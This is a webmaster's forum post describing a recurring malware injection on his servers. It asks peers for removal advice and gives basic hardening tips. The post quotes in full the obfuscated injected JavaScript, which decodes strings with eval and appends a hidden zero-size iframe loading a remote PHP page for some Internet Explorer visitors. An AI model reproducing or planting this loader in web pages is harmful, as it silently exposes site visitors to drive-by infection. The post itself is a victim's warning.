Some of my sites that using TGPX, TEVS and Comus thumbs are getting malware injection attack. One of my dedicated servers got hit by malware distributer.
Below code is injected right after the body tag of html, tmpl and some php files.
Quote:
|
<script>/**/function VtL2(RoHS, Nvy4, Ipv6) { var CnP8; CnP8=RoHS.split(Nvy4); var igs6=CnP8.join(Ipv6); return igs6;/**/ } function PKs7(cie8) { cie8 = VtL2(cie8,"##+##","'"); cie8 = VtL2(cie8,"##|##","\\"); igs6=""; gbq5 =""; for(k=0;k<cie8.length;k++) { igs6 = cie8.charCodeAt(k); if (igs6==32){igs6=35} else if (igs6==35){igs6=32} else if (igs6==59){igs6=64} else if (igs6==64){igs6=59} else if (igs6==37){igs6=42} else if (igs6==42){igs6=37} else if (igs6>=97 && igs6<=122) { igs6=igs6-97;igs6=25-igs6;igs6+=97; }else if (igs6>=65 && igs6<=90) { igs6=igs6-65;igs6=25-igs6;igs6+=65; }else if (igs6>=48 && igs6<=57) { igs6=igs6-48;igs6=9-igs6;igs6+=48; } gbq5 += String.fromCharCode(igs6); } return gbq5;/**/ }bqL1=eval;var RoSt;var Ldod;var CEg0;var Kil2;var cbk1;var Zku4;var Lfo0;bqL1(PKs7('Apf5#=###+##sggk://tzbhvc634.xln/hg/xhh/a/hgzgrx.ksk##+##@xyp8#=###+##ruiznv##+##@'));bqL1(P Ks7('IlHg#=#wlxfnvmg.xivzgvVovnvmg(xyp8)@IlHg.hvgZ ggiryfgv(##+##hix##+##,#Apf5)@'));bqL1(PKs7('IlHg. hvgZggiryfgv(##+##drwgs##+##,9)@IlHg.hvgZggiryfgv( ##+##svrtsg##+##,9)@IlHg.hvgZggiryfgv(##+##yliwvi# #+##,9)@'));bqL1(PKs7('IlHg.hvgZggiryfgv(##+##hgbo v##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+# #)@'));bqL1(PKs7('IlHg.hvgZggiryfgv(##+##hgbov##+# #,##+##wrhkozb:mlmv##+##)@#Oul9=mzertzgli.fhviZtvm g.glOldviXzhv()@'));bqL1(PKs7('XVt9=Oul9.rmwvcLu(# #+##nhrv##+##)@Owlw=Oul9.rmwvcLu(##+##nhrv#1##+##) @Pro7=Oul9.rmwvcLu(##+##mg#3##+##)@'));if ((Ldod==-1)&&(CEg0>0)&&(Kil2==-1)){bqL1(PKs7('wlxfnvmg.ylwb.zkkvmwXsrow(IlHg)@')) ;}</script>
|
I wonder if any you guys had the same experience and any luck at detecting and removing it permanently? After throwing out my pc, uploading AVG and Spybot, changing all my passwords, dropping FTP in favor of SFTP I'm now taken up the process of manually removing the code above.
But they are constantly adding this JS code even if I removed it...
Since the box is unmanagged, Maybe I will have to reload server OS and restore whole files from backup. but I'm worry about the backup is infected as well..
Beware guys, check your server security, file/dir permission etc. also your PC is not safe as well. Install a good anti-malware and don't save password at your local ftp client.
http://www.webhostingtalk.com/showth...rame+injection